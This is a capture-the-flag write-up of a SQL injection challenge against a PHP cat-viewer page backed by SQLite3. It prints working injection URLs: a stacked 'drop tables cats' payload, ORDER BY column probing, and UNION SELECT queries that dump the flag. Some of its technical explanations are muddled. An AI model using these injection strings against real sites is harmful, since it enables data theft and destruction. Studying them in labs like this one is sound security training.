This is the first of the 3 web/cloud challenges.
First, this challenge was actually pretty difficult for me for 3 reasons. Firstly, SQLMap and automation was not allowed. I greatly respect this decision as it forces you to really understand the underlying meta data and processes at hand. However, I still attempted to use SQLMap, but was quickly rate limited and instead of trying to battle their web application fire wall, I decided to do what I could manually.
Secondly, I am not a developer or web app designer, so the manual parsing of a back end database is not something I am fluid in. I was slightly disappointed by the amount of people who just focused on using SQLMap and bypassing the WAF. While this is understandable, allot of the right ups that the community posted are seriously and clearly lacking a technical understanding of the parsing, payload and discovery methodologies at hand.
Thirdly, this competition is designed to be tackled by teams of individuals, where I was flying solo.
References:
Process at a high level
Enumeration
Error based testing
Drop tables
Determine column count
Dump flag
1. Enumeration
Reviewing out challenge and browsing to the link brings us to a redirect which we can see in the image below. The primary observation is the PHP?cat=Shelton query. This is indicative of a back end SQL, no SQL or reddis like server.
From here I immediately attempted local file inclusion which lead me down a different path. You can see in the image below, that when I ran my local file inclusion command, there are 2 key pieces of information here.
"like" - which is a query command sort of like a wild card.
Our input was reflected back .
From here I spent some time meditating on where to go next as opposed to guessing. I wanted to do 2 things. Firstly I wanted to try and error based test to determine if error handling has any issues that could disclose valuable information. Secondly I wanted to test the "like" command, so see if just inputting a simple letter, would yield all cat names that started with said character. To be totally honest, I don't know why I wanted to test the later of the two, but it was a gut feeling.
I was able to successfully test the 'like' command by shortening the variable from Shelton to S which actually returned all cats that started with an S.
2. Error based testing
Next, I was able to successfully test and derive results with error based testing, as seen in the image below. This reveals some great information. Namely, the fact that the search query is utilizing "like" which is indicative of a union select or conjoined query, We can also see that our DBMS is revealed, "SQLite3". These are very important as they will be instrumental in crafting our query. We know that our payload has to follow the SQLite3 syntax.
3. Drop tables
This was a false positive in the sense that while we did drop the tables, which we guessed was titled cats, it actually worked. The downside however, is that we did not find the flag. Although I am not totally sure why at this point, we have at least identified the table name.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22or%201=1;%20drop%20tables%20cats;%20--
4. Determine Column Count
From here I wanted to figure out how many columns were present on our table. This is important as without a proper count on the column count, we won't be able to craft a proper payload. I utilized the website which is listed under the references section at the start of this blog in order to retrieve the payloads for helping with column count identification.
The query is the ORDER BY 1-- command, and we keep incrementing the query until we get an error which indeed triggers at count 5 suggesting we have 4 columns.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%201--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%202--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%203--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%204--
In this query we receive an error which reveals that are CAT table has 4 columns.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%205--
5. Final Payload
First I attempted to use a union all select, while calling id fourt times and I made an assumption that the table name was cats. So when I crafted a payload, that checks all four columns for id, we actually got a hit.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20ALL%20SELECT%20id,id,id,id%20FROM%20%27cats%27;;
From here, I attempted to escalate by calling flag four times, which was certainly guess work to a degree which is actually unforunate, as I do not like guess work. While this did reveal the flag, I wanted to tighten things up.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20ALL%20SELECT%20flag,flag,flag,flag%20FROM%20%27cats%27;;
Finally, I tightened things up by removing the ALL command, and just utilized UNION SELECT and it gave us the flag almost right away.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20SELECT%20flag,flag,flag,flag%20FROM%20%27cats%27;;
Comments